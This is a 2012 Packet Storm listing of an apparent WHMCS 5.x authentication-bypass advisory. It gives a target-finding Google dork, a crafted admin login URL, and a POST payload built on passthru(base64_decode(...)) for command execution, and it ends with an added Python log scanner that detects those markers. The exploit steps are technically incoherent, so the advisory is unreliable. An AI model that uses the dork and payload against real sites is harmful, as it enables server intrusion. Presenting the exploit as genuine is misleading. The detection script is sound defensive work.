
WHMCS 5.x Authentication Bypass

03 Jan 2013 | Reported by Agd_Scorp | Type: packetstorm | Source: packetstormsecurity.com

`WHMCS 5.x versions suffer from a cookie-validation vulnerability, where sessions can be modified and authentication can be easily bypassed.  
  
##################################################  
# Description : WHMCS 5.x Authentication Bypass Vulnerability  
# Author : Agd_Scorp  
# Contact: [email protected]  
# Version : 5.x  
# Link : http://www.whmcs.com/order-now/  
# Date : Monday, December 31, 2012  
# Dork : intext:Powered by WHMCompleteSolution  
##################################################  
  
Recommended: You must have BeEF or Tamper Data already installed; I do not recommend doing this process manually.  
  
# The Fact:  
  
WHMCS 5.0 is completely vulnerable to this vulnerability, but in version 5.1 WHMCS has added extra cache-security, so I've added an extra payload for it. You can do the exploitation process without the payload in version 5.0.  
  
  
# The Exploitation  
  
http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}  
  
After you have successfully entered that into your browser, the page will lag for a bit due to the cache-validation, which we, of course, will change. ;-)  
  
  
When the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to this:  
  
POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";  
  
Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redirect={admin_index}";  
  
  
# The Result  
  
Once you have done this process, you will automatically be redirected to the admin page, although, if the administrator has enabled cache-security, this process will fail.  
  
# Solution & Fix  
  
No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.  
  
`
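
A defender-side check for the request pattern quoted in the advisory, as an added example that is not part of the original advisory or of WHMCS: it scans web server access logs for requests to `admin/login.php` whose query string carries the markers shown above. The Combined Log Format, the marker list, the decoding depth and the sample lines are assumptions made for this example; POST bodies and custom request headers are not visible in such logs and are not covered.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Markers taken from the advisory text; the matching policy is an assumption.
QUERY_MARKERS = ("getpost{}", "passthru(", "base64_decode(")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %257B and %7B both become '{'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (ip, status, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _time, _method, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/admin/login.php"):
        return None
    query = fully_decode(parts.query).lower()
    reasons = [mk for mk in QUERY_MARKERS if mk in query]
    if "?" in query:  # the advisory's URL carries a second '?' inside the query
        reasons.append("nested '?'")
    return (ip, int(status), reasons) if reasons else None

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jan/2013:10:00:01 +0000] "GET /whmcs/admin/login.php HTTP/1.1" 200 4312',
    '203.0.113.9 - - [03/Jan/2013:10:02:44 +0000] "GET /whmcs/admin/login.php?correct&cache=1?login=getpost%7B%7D HTTP/1.1" 200 4312',
    '203.0.113.9 - - [03/Jan/2013:10:02:51 +0000] "GET /whmcs/admin/login.php?x=%2570assthru%2528 HTTP/1.1" 302 0',
    '198.51.100.7 - - [03/Jan/2013:10:05:10 +0000] "GET /whmcs/cart.php?a=view HTTP/1.1" 200 900',
]

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(ip, status, ", ".join(reasons))
```

A hit only records that the pattern was requested; the logged status code and any admin session activity that follows from the same address are what indicate whether the request had an effect.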
